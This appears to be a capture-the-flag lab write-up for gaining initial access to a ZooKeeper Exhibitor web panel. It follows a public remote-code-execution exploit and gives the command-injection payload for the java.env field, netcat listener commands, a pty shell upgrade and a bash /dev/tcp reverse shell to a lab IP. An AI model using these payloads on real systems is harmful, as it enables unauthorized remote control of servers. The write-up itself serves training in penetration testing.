http 8081 [Initial Access]

Looking at site

It looks like it is ZooKeeper software control panel.

Public exploit.

On doing a simple google search for the term exhibitor for zookeeper v1 Gives us one exploit from exploit DB.

Exhibitor Web UI 1.7.1 - Remote Code ExecutionExploit Database

I will be using this exploit.

In the exploit steps are mentioned:

Step 1:

Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON

Step 2:

In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:

$(/bin/nc -e /bin/bash 192.168.45.234 443 &)

I have changed IP and port and also shell type to bash from sh.

Start he listener.

sudo rlwrap nc -lnvp 443

step 3:

 Click Commit > All At Once > OK

You will get a shell after some time.

now statablize the shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

# In kali
sudo rlwrap nc -lnvp 443

# In other shell
bash -c "bash -i >& /dev/tcp/192.168.45.234/443 0>&1"

PreviousPelican [Easy]Nextprivilege escalation

Last updated 1 year ago

hashtagLooking at site

hashtagPublic exploit.

Looking at site

Public exploit.